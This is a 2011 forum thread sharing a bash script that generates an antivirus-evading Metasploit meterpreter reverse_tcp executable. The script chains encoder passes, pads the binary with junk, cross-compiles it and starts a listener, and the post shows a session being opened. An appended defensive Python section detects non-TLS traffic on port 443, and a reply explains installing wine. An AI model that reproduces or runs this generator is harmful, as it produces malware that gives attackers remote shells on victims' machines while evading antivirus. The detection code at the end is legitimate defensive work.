Nytro
Posted November 12, 2011

FUD Payload Generator for Backtrack

Today, based on Astr0baby's article on how we can create a fully undetectable Metasploit payload, I modified his REVERSE_TCP Payload Generator in order to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation of how it works:

```bash
#!/bin/bash
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " By Astr0baby 2011 "
echo " With some Randomic gravy and sauce to bypass Antivirus "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
rm -rf ShellCode
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ? \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IP="" # store IP
case $OS in
 Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
 *) IP="Unknown";;
esac
#echo "$IP"
# Generate the stager and run it through four chained msfencode passes (ruby-style output, one "..." + line per chunk)
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
# First padding array: $seed shuffled decimal strings, never referenced, only inflates the binary
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
# Second padding array, same construction
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4
# Cross-compile with the mingw32 toolchain and give the result a random name
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo " starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' E
```

In order to be able to compile the generated payload we must install the following packages:

```
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
```

After the installation we must move our shell script to Metasploit's default folder (/pentest/exploits/framework) and execute it:

```
root@bt:/pentest/exploits/framework# chmod +x fud.sh
root@bt:/pentest/exploits/framework# ./fud.sh
************************************************************
 Automatic shellcode generator - FOR METASPLOIT
 By Astr0baby 2011
 With some Randomic gravy and sauce to bypass Antivirus
 For Automatic Teensy programming and deployment
************************************************************
Here is a network device list available on yor machine
lo:
eth0:
What network interface are we gonna use ? eth0
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
20210.exe ...generated in ShellCode subfolder
20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe
 starting the meterpreter listener...
```

Since we have created our payload we will try to check if it works:

```
root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe
fixme:system:SetProcessDPIAware stub!
fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdc
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil)
fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stub
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil)
wine: configuration in '/root/.wine' has been updated.
fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
fixme:toolhelp:Heap32ListFirst : stub

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
AutoRunScript => migrate2 explorer.exe
[*] Started reverse handler on 192.168.200.22:443
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.200.22
[*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200

meterpreter > ps

Process list
============

 PID  Name            Arch  Session  User                      Path
 ---  ----            ----  -------  ----                      ----
 12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
 17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
 33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
 8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe

meterpreter > sysinfo
Computer        : bt
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
```

Now our payload is fully undetectable by most antivirus engines. Of course we can try to scan it using online services such as novirusthanks:

Credits go to Astr0baby

Source: http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/
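Added defensive example, not part of the post above and not code from Astr0baby's generator or from Metasploit. The listener in the thread is windows/meterpreter/reverse_tcp on LPORT=443, so the implant uses plain TCP on the HTTPS port, and as the handler log shows the server speaks first ("Sending stage ..."). A legitimate HTTPS client instead opens with a TLS ClientHello. The script below parses the first client-to-server bytes of a flow against the TLS record and handshake headers (RFC 5246 layout) and flags flows on 443 that do not start with a well-formed ClientHello. All flow samples, IP addresses and the `make_client_hello` helper are constructed for the example.

```python
# Added defensive example: flag flows on tcp/443 whose first client bytes are not a
# TLS ClientHello (plain-TCP reverse_tcp on 443 sends nothing before the server does).
# Sample flows and IPs below are constructed, not captured from the thread's setup.
from dataclasses import dataclass
import struct

TLS_HANDSHAKE = 0x16   # TLS record content type: handshake
CLIENT_HELLO = 0x01    # handshake message type: ClientHello
MAX_RECORD = 16384     # maximum TLS plaintext fragment, RFC 5246 section 6.2.1


@dataclass
class Verdict:
    is_client_hello: bool
    reason: str


def classify_client_bytes(data: bytes) -> Verdict:
    """Decide whether the first client-to-server bytes of a flow form a TLS ClientHello."""
    # 5-byte record header plus 4-byte handshake header is the minimum we can parse.
    if len(data) < 9:
        return Verdict(False, "no or too few client bytes before server data")
    ctype, major, minor, rec_len = struct.unpack("!BBBH", data[:5])
    if ctype != TLS_HANDSHAKE:
        return Verdict(False, f"record type 0x{ctype:02x} is not handshake")
    # Record-layer version is 3.0 (SSLv3) to 3.3; TLS 1.3 still uses 3.1 or 3.3 here.
    if major != 3 or minor > 3:
        return Verdict(False, f"unexpected record version {major}.{minor}")
    if rec_len == 0 or rec_len > MAX_RECORD:
        return Verdict(False, f"implausible record length {rec_len}")
    htype = data[5]
    hs_len = int.from_bytes(data[6:9], "big")
    if htype != CLIENT_HELLO:
        return Verdict(False, f"handshake type 0x{htype:02x} is not ClientHello")
    # Strict check: the ClientHello is expected to fit in a single record.
    if hs_len + 4 != rec_len:
        return Verdict(False, "handshake length does not match record length")
    return Verdict(True, "TLS ClientHello")


def suspicious_flows(flows):
    """flows: iterable of (client_ip, dst_port, first_client_bytes).
    Returns [(client_ip, reason)] for flows on 443 that do not open with a ClientHello."""
    hits = []
    for client_ip, dst_port, first_bytes in flows:
        if dst_port != 443:
            continue
        verdict = classify_client_bytes(first_bytes)
        if not verdict.is_client_hello:
            hits.append((client_ip, verdict.reason))
    return hits


def make_client_hello() -> bytes:
    """Build a minimal, well-formed TLS 1.2 ClientHello (constructed test input)."""
    body = (b"\x03\x03" + b"\x11" * 32   # client_version + 32-byte random
            + b"\x00"                    # session_id length 0
            + b"\x00\x02\x13\x01"        # cipher_suites: one suite
            + b"\x01\x00"                # compression_methods: null only
            + b"\x00\x00")               # extensions length 0
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE, 0x03, 0x01]) + len(handshake).to_bytes(2, "big") + handshake


# Constructed sample flows: a normal HTTPS client, a reverse_tcp-style connection where
# the client sent nothing, cleartext HTTP on 443, and cleartext HTTP on 80 (ignored).
SAMPLE_FLOWS = [
    ("10.0.0.10", 443, make_client_hello()),
    ("10.0.0.22", 443, b""),
    ("10.0.0.31", 443, b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),
    ("10.0.0.40", 80, b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),
]

if __name__ == "__main__":
    for ip, reason in suspicious_flows(SAMPLE_FLOWS):
        print(f"ALERT non-TLS client on 443 from {ip}: {reason}")
```

Running the script prints one alert each for 10.0.0.22 (client silent before the server) and 10.0.0.31 (cleartext HTTP on 443); the real ClientHello and the port 80 flow are not reported. Fed with the first client bytes of each flow from a sensor or pcap, the same check singles out reverse_tcp-style use of 443 without needing any signature for the encoded payload itself.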
neox
Posted November 13, 2011

The payload doesn't run locally; to execute it locally you need to install wine 1.3:

```
apt-get install synaptic
sudo add-apt-repository ppa:ubuntu-wine/ppa
apt-get update
apt-get install wine1.3
root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe
```

Otherwise, very good.